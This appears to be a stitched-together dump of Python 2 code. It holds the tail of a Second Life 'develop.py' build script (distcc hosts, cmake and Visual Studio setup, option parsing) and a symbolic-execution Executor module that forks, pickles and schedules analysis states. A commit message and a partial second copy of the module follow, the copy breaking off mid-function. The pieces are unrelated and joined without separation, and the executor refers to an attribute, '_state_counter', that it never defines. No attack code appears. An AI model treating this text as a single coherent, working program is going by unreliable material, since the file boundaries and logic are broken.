l = l[l.find('#')+1:].strip()
if l: hosts.append(l)
return hosts
except IOError:
return (os.getenv('DISTCC_HOSTS', '').split() or
[localhost()[0]])
def count_distcc_hosts():
cpus = 0
hosts = 0
for host in get_distcc_hosts():
m = re.match(r'.*/(\d+)', host)
hosts += 1
cpus += m and int(m.group(1)) or 1
return hosts, cpus
def mk_distcc_hosts(basename, range, num_cpus):
'''Generate a list of LL-internal machines to build on.'''
loc_entry, cpus = localhost()
hosts = [loc_entry]
dead = []
stations = [s for s in xrange(range) if s not in dead]
random.shuffle(stations)
hosts += ['%s%d.lindenlab.com/%d,lzo' % (basename, s, num_cpus) for s in stations]
cpus += 2 * len(stations)
return ' '.join(hosts), cpus
if job_count is None:
hosts, job_count = count_distcc_hosts()
hostname = socket.gethostname()
if hosts == 1:
if hostname.startswith('station'):
hosts, job_count = mk_distcc_hosts('station', 36, 2)
os.environ['DISTCC_HOSTS'] = hosts
if hostname.startswith('eniac'):
hosts, job_count = mk_distcc_hosts('eniac', 71, 2)
os.environ['DISTCC_HOSTS'] = hosts
if hostname.startswith('build'):
max_jobs = 6
else:
max_jobs = 12
if job_count > max_jobs:
job_count = max_jobs;
opts.extend(['-j', str(job_count)])
if targets:
targets = ' '.join(targets)
else:
targets = 'all'
for d in self.build_dirs():
cmd = 'make -C %r %s %s' % (d, ' '.join(opts), targets)
print 'Running %r' % cmd
self.run(cmd)
class DarwinSetup(UnixSetup):
def __init__(self):
super(DarwinSetup, self).__init__()
self.generator = 'Xcode'
def os(self):
return 'darwin'
def arch(self):
if self.universal == 'ON':
return 'universal'
else:
return UnixSetup.arch(self)
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.generator,
opts=quote(opts),
standalone=self.standalone,
word_size=self.word_size,
unattended=self.unattended,
project_name=self.project_name,
universal=self.universal,
type=self.build_type.upper(),
)
if self.universal == 'ON':
args['universal'] = '-DCMAKE_OSX_ARCHITECTURES:STRING=\'i386;ppc\''
#if simple:
# return 'cmake %(opts)s %(dir)r' % args
return ('cmake -G %(generator)r '
'-DCMAKE_BUILD_TYPE:STRING=%(type)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(universal)s '
'%(opts)s %(dir)r' % args)
def run_build(self, opts, targets):
cwd = getcwd()
if targets:
targets = ' '.join(['-target ' + repr(t) for t in targets])
else:
targets = ''
cmd = ('xcodebuild -configuration %s %s %s | grep -v "^[[:space:]]*setenv" ; exit ${PIPESTATUS[0]}' %
(self.build_type, ' '.join(opts), targets))
for d in self.build_dirs():
try:
os.chdir(d)
print 'Running %r in %r' % (cmd, d)
self.run(cmd)
finally:
os.chdir(cwd)
class WindowsSetup(PlatformSetup):
gens = {
'vc71' : {
'gen' : r'Visual Studio 7 .NET 2003',
'ver' : r'7.1'
},
'vc80' : {
'gen' : r'Visual Studio 8 2005',
'ver' : r'8.0'
},
'vc90' : {
'gen' : r'Visual Studio 9 2008',
'ver' : r'9.0'
}
}
gens['vs2003'] = gens['vc71']
gens['vs2005'] = gens['vc80']
gens['vs2008'] = gens['vc90']
search_path = r'C:\windows'
exe_suffixes = ('.exe', '.bat', '.com')
def __init__(self):
super(WindowsSetup, self).__init__()
self._generator = None
self.incredibuild = False
def _get_generator(self):
if self._generator is None:
for version in 'vc80 vc90 vc71'.split():
if self.find_visual_studio(version):
self._generator = version
print 'Building with ', self.gens[version]['gen']
break
else:
print >> sys.stderr, 'Cannot find a Visual Studio installation!'
sys.exit(1)
return self._generator
def _set_generator(self, gen):
self._generator = gen
generator = property(_get_generator, _set_generator)
def os(self):
return 'win32'
def build_dirs(self):
return ['build-' + self.generator]
def cmake_commandline(self, src_dir, build_dir, opts, simple):
args = dict(
dir=src_dir,
generator=self.gens[self.generator.lower()]['gen'],
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
project_name=self.project_name,
word_size=self.word_size,
)
#if simple:
# return 'cmake %(opts)s "%(dir)s"' % args
return ('cmake -G "%(generator)s" '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DUNATTENDED:BOOL=%(unattended)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s "%(dir)s"' % args)
def get_HKLM_registry_value(self, key_str, value_str):
import _winreg
reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
key = _winreg.OpenKey(reg, key_str)
value = _winreg.QueryValueEx(key, value_str)[0]
print 'Found: %s' % value
return value
def find_visual_studio(self, gen=None):
if gen is None:
gen = self._generator
gen = gen.lower()
value_str = (r'EnvironmentDirectory')
key_str = (r'SOFTWARE\Microsoft\VisualStudio\%s\Setup\VS' %
self.gens[gen]['ver'])
print ('Reading VS environment from HKEY_LOCAL_MACHINE\%s\%s' %
(key_str, value_str))
try:
return self.get_HKLM_registry_value(key_str, value_str)
except WindowsError, err:
key_str = (r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\%s\Setup\VS' %
self.gens[gen]['ver'])
try:
return self.get_HKLM_registry_value(key_str, value_str)
except:
print >> sys.stderr, "Didn't find ", self.gens[gen]['gen']
return ''
def get_build_cmd(self):
if self.incredibuild:
config = self.build_type
if self.gens[self.generator]['ver'] in [ r'8.0', r'9.0' ]:
config = '\"%s|Win32\"' % config
executable = 'buildconsole'
cmd = "%(bin)s %(prj)s.sln /build /cfg=%(cfg)s" % {'prj': self.project_name, 'cfg': config, 'bin': executable}
return (executable, cmd)
# devenv.com is CLI friendly, devenv.exe... not so much.
executable = '%sdevenv.com' % (self.find_visual_studio(),)
cmd = ('"%s" %s.sln /build %s' %
(executable, self.project_name, self.build_type))
return (executable, cmd)
def run(self, command, name=None, retry_on=None, retries=1):
'''Run a program. If the program fails, raise an exception.'''
assert name is not None, 'On windows an executable path must be given in name.'
if os.path.isfile(name):
path = name
else:
path = self.find_in_path(name)[0]
while retries:
retries = retries - 1
print "develop.py tries to run:", command
ret = subprocess.call(command, executable=path)
print "got ret", ret, "from", command
if ret:
error = 'exited with status %d' % ret
if retry_on is not None and retry_on == ret:
print "Retrying... the command %r %s" % (name, error)
else:
raise CommandError('the command %r %s' % (name, error))
def run_cmake(self, args=[]):
'''Override to add the vstool.exe call after running cmake.'''
PlatformSetup.run_cmake(self, args)
if self.unattended == 'OFF':
self.run_vstool()
def run_vstool(self):
for build_dir in self.build_dirs():
stamp = os.path.join(build_dir, 'vstool.txt')
try:
prev_build = open(stamp).read().strip()
except IOError:
prev_build = ''
if prev_build == self.build_type:
# Only run vstool if the build type has changed.
continue
executable = os.path.join('tools','vstool','VSTool.exe')
vstool_cmd = (executable +
' --solution ' +
os.path.join(build_dir,'SecondLife.sln') +
' --config ' + self.build_type +
' --startup secondlife-bin')
print 'Running %r in %r' % (vstool_cmd, getcwd())
self.run(vstool_cmd, name=executable)
print >> open(stamp, 'w'), self.build_type
def run_build(self, opts, targets):
cwd = getcwd()
executable, build_cmd = self.get_build_cmd()
for d in self.build_dirs():
try:
os.chdir(d)
if targets:
for t in targets:
cmd = '%s /project %s %s' % (build_cmd, t, ' '.join(opts))
print 'Running %r in %r' % (cmd, d)
self.run(cmd, name=executable, retry_on=4, retries=3)
else:
cmd = '%s %s' % (build_cmd, ' '.join(opts))
print 'Running %r in %r' % (cmd, d)
self.run(cmd, name=executable, retry_on=4, retries=3)
finally:
os.chdir(cwd)
class CygwinSetup(WindowsSetup):
def __init__(self):
super(CygwinSetup, self).__init__()
self.generator = 'vc80'
def cmake_commandline(self, src_dir, build_dir, opts, simple):
dos_dir = commands.getoutput("cygpath -w %s" % src_dir)
args = dict(
dir=dos_dir,
generator=self.gens[self.generator.lower()]['gen'],
opts=quote(opts),
standalone=self.standalone,
unattended=self.unattended,
project_name=self.project_name,
word_size=self.word_size,
)
#if simple:
# return 'cmake %(opts)s "%(dir)s"' % args
return ('cmake -G "%(generator)s" '
'-DUNATTENDED:BOOl=%(unattended)s '
'-DSTANDALONE:BOOL=%(standalone)s '
'-DWORD_SIZE:STRING=%(word_size)s '
'-DROOT_PROJECT_NAME:STRING=%(project_name)s '
'%(opts)s "%(dir)s"' % args)
setup_platform = {
'darwin': DarwinSetup,
'linux2': LinuxSetup,
'win32' : WindowsSetup,
'cygwin' : CygwinSetup
}
usage_msg = '''
Usage: develop.py [options] [command [command-options]]
Options:
-h | --help print this help message
--standalone build standalone, without Linden prebuild libraries
--unattended build unattended, do not invoke any tools requiring
a human response
--universal build a universal binary on Mac OS X (unsupported)
-t | --type=NAME build type ("Debug", "Release", or "RelWithDebInfo")
-m32 | -m64 build architecture (32-bit or 64-bit)
-N | --no-distcc disable use of distcc
-G | --generator=NAME generator name
Windows: VC71 or VS2003 (default), VC80 (VS2005) or
VC90 (VS2008)
Mac OS X: Xcode (default), Unix Makefiles
Linux: Unix Makefiles (default), KDevelop3
-p | --project=NAME set the root project name. (Doesn't effect makefiles)
Commands:
build configure and build default target
clean delete all build directories, does not affect sources
configure configure project by running cmake (default command if none given)
Command-options for "configure":
We use cmake variables to change the build configuration.
-DSERVER:BOOL=OFF Don't configure simulator/dataserver/etc
-DVIEWER:BOOL=OFF Don't configure the viewer
-DPACKAGE:BOOL=ON Create "package" target to make installers
-DLOCALIZESETUP:BOOL=ON Create one win_setup target per supported language
Examples:
Set up a viewer-only project for your system:
develop.py configure -DSERVER:BOOL=OFF
Set up a Visual Studio 2005 project with "package" target:
develop.py -G vc80 configure -DPACKAGE:BOOL=ON
'''
def main(arguments):
if os.getenv('DISTCC_DIR') is None:
distcc_dir = os.path.join(getcwd(), '.distcc')
if not os.path.exists(distcc_dir):
os.mkdir(distcc_dir)
print "setting DISTCC_DIR to %s" % distcc_dir
os.environ['DISTCC_DIR'] = distcc_dir
else:
print "DISTCC_DIR is set to %s" % os.getenv('DISTCC_DIR')
setup = setup_platform[sys.platform]()
try:
opts, args = getopt.getopt(
arguments,
'?hNt:p:G:m:',
['help', 'standalone', 'no-distcc', 'unattended', 'universal', 'type=', 'incredibuild', 'generator=', 'project='])
except getopt.GetoptError, err:
print >> sys.stderr, 'Error:', err
print >> sys.stderr, """
Note: You must pass -D options to cmake after the "configure" command
For example: develop.py configure -DSERVER:BOOL=OFF"""
print >> sys.stderr, usage_msg.strip()
sys.exit(1)
for o, a in opts:
if o in ('-?', '-h', '--help'):
print usage_msg.strip()
sys.exit(0)
elif o in ('--standalone',):
setup.standalone = 'ON'
elif o in ('--unattended',):
setup.unattended = 'ON'
elif o in ('--universal',):
setup.universal = 'ON'
elif o in ('-m',):
if a in ('32', '64'):
setup.word_size = int(a)
else:
print >> sys.stderr, 'Error: unknown word size', repr(a)
print >> sys.stderr, 'Supported word sizes: 32, 64'
sys.exit(1)
elif o in ('-t', '--type'):
try:
setup.build_type = setup.build_types[a.lower()]
except KeyError:
print >> sys.stderr, 'Error: unknown build type', repr(a)
print >> sys.stderr, 'Supported build types:'
types = setup.build_types.values()
types.sort()
for t in types:
print ' ', t
sys.exit(1)
elif o in ('-G', '--generator'):
setup.generator = a
elif o in ('-N', '--no-distcc'):
setup.distcc = False
elif o in ('-p', '--project'):
setup.project_name = a
elif o in ('--incredibuild'):
setup.incredibuild = True
else:
print >> sys.stderr, 'INTERNAL ERROR: unhandled option', repr(o)
sys.exit(1)
if not args:
setup.run_cmake()
return
try:
cmd = args.pop(0)
if cmd in ('cmake', 'configure'):
setup.run_cmake(args)
elif cmd == 'build':
for d in setup.build_dirs():
if not os.path.exists(d):
raise CommandError('run "develop.py cmake" first')
setup.run_cmake()
opts, targets = setup.parse_build_opts(args)
setup.run_build(opts, targets)
elif cmd == 'clean':
if args:
raise CommandError('clean takes no arguments')
setup.cleanup()
else:
print >> sys.stderr, 'Error: unknown subcommand', repr(cmd)
print >> sys.stderr, "(run 'develop.py --help' for help)"
sys.exit(1)
except getopt.GetoptError, err:
print >> sys.stderr, 'Error with %r subcommand: %s' % (cmd, err)
sys.exit(1)
if __name__ == '__main__':
try:
main(sys.argv[1:])
except CommandError, err:
print >> sys.stderr, 'Error:', err
sys.exit(1)
|
import sys
import time
import os
import copy
import cPickle
import random
import logging
import pstats
import traceback
import signal
import weakref
try:
import cStringIO as StringIO
except:
import StringIO
from math import ceil, log
from ..utils.nointerrupt import WithKeyboardInterruptAs
from .cpu.abstractcpu import DecodeException, ConcretizeRegister
from .memory import ConcretizeMemory
from .smtlib import solver, Expression, Operators, SolverException, Array, BitVec, Bool, ConstraintSet
from ..utils.event import Signal, forward_signals
from ..utils.helpers import issymbolic
from .state import Concretize, TerminateState
from multiprocessing.managers import SyncManager
from contextlib import contextmanager
#This is the single global manager that will handle all shared memory among workers
def mgr_init():
signal.signal(signal.SIGINT, signal.SIG_IGN)
manager = SyncManager()
manager.start(mgr_init)
#module wide logger
logger = logging.getLogger("EXECUTOR")
def sync(f):
""" Synchronization decorator. """
def newFunction(self, *args, **kw):
self._lock.acquire()
try:
return f(self, *args, **kw)
finally:
self._lock.release()
return newFunction
class Policy(object):
''' Base class for prioritization of state search '''
def __init__(self):
pass
def features(self, state):
''' Save state features for prioritization before a state is stored '''
pass
def priority(self, state_id):
''' A numeric value representing likelihood to reach the interesting program spot '''
return 1.0
class Random(Policy):
def __init__(self):
super(Random, self).__init__()
def features(self, state):
''' Save state features for prioritization before a state is stored '''
pass
def priority(self, state_id):
''' A numeric value representing likelihood to reach the interesting program spot '''
return 1.0
class Executor(object):
'''
The executor guides the execution of an initial state or a paused previous run.
It handles all exceptional conditions (system calls, memory faults, concretization, etc.)
'''
def __init__(self, initial=None, workspace=None, policy='random', context=None, **options):
assert os.path.isdir(workspace), 'Workspace must be a directory'
self.workspace = workspace
logger.debug("Workspace set: %s", self.workspace)
# Signals / Callbacks handlers will be invoked potentially at different
# worker processes. State provides a local context to save data.
#Executor signals
self.will_start_run = Signal()
self.will_finish_run = Signal()
self.will_fork_state = Signal()
self.will_store_state = Signal()
self.will_load_state = Signal()
self.will_terminate_state = Signal()
self.will_generate_testcase = Signal()
#Be sure every state will forward us their signals
self.will_load_state += self._register_state_callbacks
#The main executor lock. Acquire this for accessing shared objects
self._lock = manager.Condition(manager.RLock())
#Shutdown Event
self._shutdown = manager.Event()
#States on storage. Shared dict state name -> state stats
self._states = manager.list()
#Number of currently running workers. Initially no runnign workers
self._running = manager.Value('i', 0 )
#Number of generated testcases
self._test_count = manager.Value('i', 0 )
#Number of total intermediate states
self._state_count = manager.Value('i', 0 )
#Executor wide shared context
if context is None:
context = {}
self._shared_context = manager.dict(context)
#scheduling priority policy (wip)
self.policy = Random()
if self.load_workspace():
if initial is not None:
logger.error("Ignoring initial state")
else:
if initial is not None:
self.add(initial)
##FIXME PUBSUB We need to forward signals here so they get declared
##forward signals from initial state so they are declared here
forward_signals(self, initial, True)
@contextmanager
def locked_context(self):
''' Executor context is a shared memory object. All workers share this.
It needs a lock. Its used like this:
with executor.context() as context:
vsited = context['visited']
visited.append(state.cpu.PC)
context['visited'] = visited
'''
with self._lock:
yield self._shared_context
def _register_state_callbacks(self, state, state_id):
'''
Install forwarding callbacks in state so the events can go up.
Going up, we prepend state in the arguments.
'''
#Forward all state signals
forward_signals(self, state, True)
def add(self, state):
'''
Enqueue state.
Save state on storage, assigns an id to it, then add it to the
priority queue
'''
#save the state to secondary storage
state_id = self.store(state)
#add the state to the list of pending states
self.put(state_id)
return state_id
def load_workspace(self):
#Browse and load states in a workspace in case we are trying to
# continue from paused run
saved_states = []
for filename in os.listdir(self.workspace):
if filename.startswith('state_') and filename.endswith('.pkl'):
saved_states.append(self._workspace_filename(filename))
#We didn't find any saved intermediate states in the workspace
if not saved_states:
return False
#search finalized testcases
saved_testcases = []
for filename in os.listdir(self.workspace):
if filename.startswith('test_') and filename.endswith('.pkl'):
saved_testcases.append(self._workspace_filename(filename))
#Load saved states into the queue
for filename in saved_states:
state_id = int(filename[6:-4])
self._states.append(state_id)
#reset test and states counter
for filename in saved_states:
state_id = int(filename[6:-4])
self._state_count.value = max(self._state_counter.value, state_id)
for filename in saved_testcases:
state_id = int(filename[6:-4])
self._test_count.value = max(self._test_counter.value, state_id)
#Return True if we have loaded some sates to continue from
return len(saved_states)>0
################################################
# Workspace filenames
def _workspace_filename(self, filename):
return os.path.join(self.workspace, filename)
def _state_filename(self, state_id):
filename = 'state_%06d.pkl'%state_id
return self._workspace_filename(filename)
def _testcase_filename(self, state_id):
filename = 'test_%06d.pkl'%state_id
return self._workspace_filename(filename)
################################################
#Shared counters
@sync
def _new_state_id(self):
''' This gets an uniq shared id for a new state '''
self._state_count.value += 1
return self._state_count.value
@sync
def _new_testcase_id(self):
''' This gets an uniq shared id for a new testcase '''
self._test_count.value += 1
return self._test_count.value
###############################################
# Synchronization helpers
@sync
def _start_run(self):
#notify siblings we are about to start a run()
self._running.value+=1
@sync
def _stop_run(self):
#notify siblings we are about to stop this run()
self._running.value-=1
assert self._running.value >=0
self._lock.notify_all()
################################################
#Public API
@property
def running(self):
''' Report an estimate of how many workers are currently running '''
return self._running.value
def shutdown(self):
''' This will stop all workers '''
self._shutdown.set()
def is_shutdown(self):
''' Returns True if shutdown was requested '''
return self._shutdown.is_set()
###############################################
# Priority queue
@sync
def put(self, state_id):
''' Enqueue it for processing '''
self._states.append(state_id)
self._lock.notify_all()
return state_id
@sync
def get(self):
''' Dequeue a state with the max priority '''
#A shutdown has been requested
if self.is_shutdown():
return None
#if not more states in the queue lets wait for some forks
while len(self._states) == 0:
#if no worker is running bail out
if self.running == 0:
return None
#if a shutdown has been requested bail out
if self.is_shutdown():
return None
#if there is actually some workers running wait for state forks
logger.debug("Waiting for available states")
self._lock.wait()
state_id = random.choice(self._states)
del self._states[self._states.index(state_id)]
return state_id
###############################################################
# File Storage
def store(self, state):
''' Put state in secondary storage and retuns an state_id for it'''
state_id = self._new_state_id()
state_filename = self._state_filename(state_id)
logger.debug("Saving state %d to file %s", state_id, state_filename)
with open(state_filename, 'w+') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.warning("Using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
#broadcast event
self.will_store_state(state, state_id)
return state_id
def load(self, state_id):
''' Brings a state from storage selected by state_id'''
if state_id is None:
return None
filename = self._state_filename(state_id)
logger.debug("Restoring state: %s from %s", state_id, filename )
with open(filename, 'rb') as f:
loaded_state = cPickle.loads(f.read())
logger.debug("Removing state %s from storage", state_id)
os.remove(filename)
#Broadcast event
self.will_load_state(loaded_state, state_id)
return loaded_state
def list(self):
''' Returns the list of states ids currently queued '''
return list(self._states)
def generate_testcase(self, state, message='Testcase generated'):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
testcase_id = self._new_testcase_id()
logger.info("Generating testcase No. %d - %s", testcase_id, message)
#broadcast test generation. This is the time for other modules
#to output whatever helps to understand this testcase
self.will_generate_testcase(state, testcase_id, message)
# Save state
start = time.time()
filename = self._testcase_filename(testcase_id)
with open(filename, 'wb') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.debug("WARNING: using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
logger.debug("saved in %d seconds", time.time() - start)
def fork(self, state, expression, policy='ALL', setstate=None):
'''
Fork state on expression concretizations.
Using policy build a list of solutions for expression.
For the state on each solution setting the new state with setstate
For example if expression is a Bool it may have 2 solutions. True or False.
Parent
(expression = ??)
Child1 Child2
(expression = True) (expression = True)
setstate(True) setstate(False)
The optional setstate() function is supposed to set the concrete value
in the child state.
'''
assert isinstance(expression, Expression)
if setstate is None:
setstate = lambda x,y: None
#Find a set of solutions for expression
solutions = state.concretize(expression, policy)
#We are about to fork current_state
with self._lock:
self.will_fork_state(state, expression, solutions, policy)
#Build and enqueue a state for each solution
children = []
for new_value in solutions:
with state as new_state:
new_state.constrain(expression == new_value) #We already know it's sat
#and set the PC of the new state to the concrete pc-dest
#(or other register or memory address to concrete)
setstate(new_state, new_value)
#enqueue new_state
state_id = self.add(new_state)
#maintain a list of childres for logging purpose
children.append(state_id)
logger.debug("Forking current state into states %r",children)
return None
def run(self):
'''
Entry point of the Executor; called by workers to start analysis.
'''
#policy_order=self.policy_order
#policy=self.policy
current_state = None
current_state_id = None
with WithKeyboardInterruptAs(self.shutdown):
#notify siblings we are about to start a run
self._start_run()
logger.debug("Starting Manticore Symbolic Emulator Worker (pid %d).",os.getpid())
while not self.is_shutdown():
try:
#select a suitable state to analyze
if current_state is None:
with self._lock:
#notify siblings we are about to stop this run
self._stop_run()
#Select a single state_id
current_state_id = self.get()
#load selected state from secondary storage
current_state = self.load(current_state_id)
#notify siblings we have a state to play with
self._start_run()
#If current_state is still None. We are done.
if current_state is None:
logger.debug("No more states in the queue, byte bye!")
break
assert current_state is not None
try:
# Allows to terminate manticore worker on user request
while not self.is_shutdown():
if not current_state.execute():
break
else:
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Shutdown')
current_state = None
#Handling Forking and terminating exceptions
except Concretize as e:
#expression
#policy
#setstate()
logger.debug("Generic state fork on condition")
self.fork(current_state, e.expression, e.policy, e.setstate)
current_state = None
except TerminateState as e:
#logger.error("MemoryException at PC: 0x{:016x}. Cause: {}\n".format(current_state.cpu.instruction.address, e.cause))
#self.generate_testcase(current_state, "Memory Exception: " + str(e))
#self.generate_testcase(current_state, "Invalid PC Exception" + str(e))
#self.generate_testcase(current_state, "Program finished correctly")
#logger.error("Syscall not implemented: %s", str(e))
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, e)
logger.debug("Generic terminate state")
if e.testcase:
self.generate_testcase(current_state, str(e))
current_state = None
except SolverException as e:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_exc:"
traceback.print_exc()
#Notify this state is done
self.will_terminate_state(current_state, current_state_id, e)
if solver.check(current_state.constraints):
self.generate_testcase(current_state, "Solver failed" + str(e))
current_state = None
except (Exception, AssertionError) as e:
import traceback
trace = traceback.format_exc()
logger.error("Exception: %s\n%s", str(e), trace)
for trace_line in trace.splitlines():
logger.error(trace_line)
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Exception')
current_state = None
logger.setState(None)
assert current_state is None
#notify siblings we are about to stop this run
self._stop_run()
#Notify this worker is done (not sure it's needed)
self.will_finish_run()
stop double-logging error traces (#369)
import sys
import time
import os
import copy
import cPickle
import random
import logging
import pstats
import traceback
import signal
import weakref
try:
import cStringIO as StringIO
except:
import StringIO
from math import ceil, log
from ..utils.nointerrupt import WithKeyboardInterruptAs
from .cpu.abstractcpu import DecodeException, ConcretizeRegister
from .memory import ConcretizeMemory
from .smtlib import solver, Expression, Operators, SolverException, Array, BitVec, Bool, ConstraintSet
from ..utils.event import Signal, forward_signals
from ..utils.helpers import issymbolic
from .state import Concretize, TerminateState
from multiprocessing.managers import SyncManager
from contextlib import contextmanager
#This is the single global manager that will handle all shared memory among workers
def mgr_init():
signal.signal(signal.SIGINT, signal.SIG_IGN)
manager = SyncManager()
manager.start(mgr_init)
#module wide logger
logger = logging.getLogger("EXECUTOR")
def sync(f):
""" Synchronization decorator. """
def newFunction(self, *args, **kw):
self._lock.acquire()
try:
return f(self, *args, **kw)
finally:
self._lock.release()
return newFunction
class Policy(object):
''' Base class for prioritization of state search '''
def __init__(self):
pass
def features(self, state):
''' Save state features for prioritization before a state is stored '''
pass
def priority(self, state_id):
''' A numeric value representing likelihood to reach the interesting program spot '''
return 1.0
class Random(Policy):
def __init__(self):
super(Random, self).__init__()
def features(self, state):
''' Save state features for prioritization before a state is stored '''
pass
def priority(self, state_id):
''' A numeric value representing likelihood to reach the interesting program spot '''
return 1.0
class Executor(object):
'''
The executor guides the execution of an initial state or a paused previous run.
It handles all exceptional conditions (system calls, memory faults, concretization, etc.)
'''
def __init__(self, initial=None, workspace=None, policy='random', context=None, **options):
assert os.path.isdir(workspace), 'Workspace must be a directory'
self.workspace = workspace
logger.debug("Workspace set: %s", self.workspace)
# Signals / Callbacks handlers will be invoked potentially at different
# worker processes. State provides a local context to save data.
#Executor signals
self.will_start_run = Signal()
self.will_finish_run = Signal()
self.will_fork_state = Signal()
self.will_store_state = Signal()
self.will_load_state = Signal()
self.will_terminate_state = Signal()
self.will_generate_testcase = Signal()
#Be sure every state will forward us their signals
self.will_load_state += self._register_state_callbacks
#The main executor lock. Acquire this for accessing shared objects
self._lock = manager.Condition(manager.RLock())
#Shutdown Event
self._shutdown = manager.Event()
#States on storage. Shared dict state name -> state stats
self._states = manager.list()
#Number of currently running workers. Initially no runnign workers
self._running = manager.Value('i', 0 )
#Number of generated testcases
self._test_count = manager.Value('i', 0 )
#Number of total intermediate states
self._state_count = manager.Value('i', 0 )
#Executor wide shared context
if context is None:
context = {}
self._shared_context = manager.dict(context)
#scheduling priority policy (wip)
self.policy = Random()
if self.load_workspace():
if initial is not None:
logger.error("Ignoring initial state")
else:
if initial is not None:
self.add(initial)
##FIXME PUBSUB We need to forward signals here so they get declared
##forward signals from initial state so they are declared here
forward_signals(self, initial, True)
@contextmanager
def locked_context(self):
''' Executor context is a shared memory object. All workers share this.
It needs a lock. Its used like this:
with executor.context() as context:
vsited = context['visited']
visited.append(state.cpu.PC)
context['visited'] = visited
'''
with self._lock:
yield self._shared_context
def _register_state_callbacks(self, state, state_id):
'''
Install forwarding callbacks in state so the events can go up.
Going up, we prepend state in the arguments.
'''
#Forward all state signals
forward_signals(self, state, True)
def add(self, state):
'''
Enqueue state.
Save state on storage, assigns an id to it, then add it to the
priority queue
'''
#save the state to secondary storage
state_id = self.store(state)
#add the state to the list of pending states
self.put(state_id)
return state_id
def load_workspace(self):
#Browse and load states in a workspace in case we are trying to
# continue from paused run
saved_states = []
for filename in os.listdir(self.workspace):
if filename.startswith('state_') and filename.endswith('.pkl'):
saved_states.append(self._workspace_filename(filename))
#We didn't find any saved intermediate states in the workspace
if not saved_states:
return False
#search finalized testcases
saved_testcases = []
for filename in os.listdir(self.workspace):
if filename.startswith('test_') and filename.endswith('.pkl'):
saved_testcases.append(self._workspace_filename(filename))
#Load saved states into the queue
for filename in saved_states:
state_id = int(filename[6:-4])
self._states.append(state_id)
#reset test and states counter
for filename in saved_states:
state_id = int(filename[6:-4])
self._state_count.value = max(self._state_counter.value, state_id)
for filename in saved_testcases:
state_id = int(filename[6:-4])
self._test_count.value = max(self._test_counter.value, state_id)
#Return True if we have loaded some sates to continue from
return len(saved_states)>0
################################################
# Workspace filenames
def _workspace_filename(self, filename):
return os.path.join(self.workspace, filename)
def _state_filename(self, state_id):
filename = 'state_%06d.pkl'%state_id
return self._workspace_filename(filename)
def _testcase_filename(self, state_id):
filename = 'test_%06d.pkl'%state_id
return self._workspace_filename(filename)
################################################
#Shared counters
@sync
def _new_state_id(self):
''' This gets an uniq shared id for a new state '''
self._state_count.value += 1
return self._state_count.value
@sync
def _new_testcase_id(self):
''' This gets an uniq shared id for a new testcase '''
self._test_count.value += 1
return self._test_count.value
###############################################
# Synchronization helpers
@sync
def _start_run(self):
#notify siblings we are about to start a run()
self._running.value+=1
@sync
def _stop_run(self):
#notify siblings we are about to stop this run()
self._running.value-=1
assert self._running.value >=0
self._lock.notify_all()
################################################
#Public API
@property
def running(self):
''' Report an estimate of how many workers are currently running '''
return self._running.value
def shutdown(self):
''' This will stop all workers '''
self._shutdown.set()
def is_shutdown(self):
''' Returns True if shutdown was requested '''
return self._shutdown.is_set()
###############################################
# Priority queue
@sync
def put(self, state_id):
''' Enqueue it for processing '''
self._states.append(state_id)
self._lock.notify_all()
return state_id
@sync
def get(self):
''' Dequeue a state with the max priority '''
#A shutdown has been requested
if self.is_shutdown():
return None
#if not more states in the queue lets wait for some forks
while len(self._states) == 0:
#if no worker is running bail out
if self.running == 0:
return None
#if a shutdown has been requested bail out
if self.is_shutdown():
return None
#if there is actually some workers running wait for state forks
logger.debug("Waiting for available states")
self._lock.wait()
state_id = random.choice(self._states)
del self._states[self._states.index(state_id)]
return state_id
###############################################################
# File Storage
def store(self, state):
''' Put state in secondary storage and retuns an state_id for it'''
state_id = self._new_state_id()
state_filename = self._state_filename(state_id)
logger.debug("Saving state %d to file %s", state_id, state_filename)
with open(state_filename, 'w+') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.warning("Using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
#broadcast event
self.will_store_state(state, state_id)
return state_id
def load(self, state_id):
''' Brings a state from storage selected by state_id'''
if state_id is None:
return None
filename = self._state_filename(state_id)
logger.debug("Restoring state: %s from %s", state_id, filename )
with open(filename, 'rb') as f:
loaded_state = cPickle.loads(f.read())
logger.debug("Removing state %s from storage", state_id)
os.remove(filename)
#Broadcast event
self.will_load_state(loaded_state, state_id)
return loaded_state
def list(self):
''' Returns the list of states ids currently queued '''
return list(self._states)
def generate_testcase(self, state, message='Testcase generated'):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
testcase_id = self._new_testcase_id()
logger.info("Generating testcase No. %d - %s", testcase_id, message)
#broadcast test generation. This is the time for other modules
#to output whatever helps to understand this testcase
self.will_generate_testcase(state, testcase_id, message)
# Save state
start = time.time()
filename = self._testcase_filename(testcase_id)
with open(filename, 'wb') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
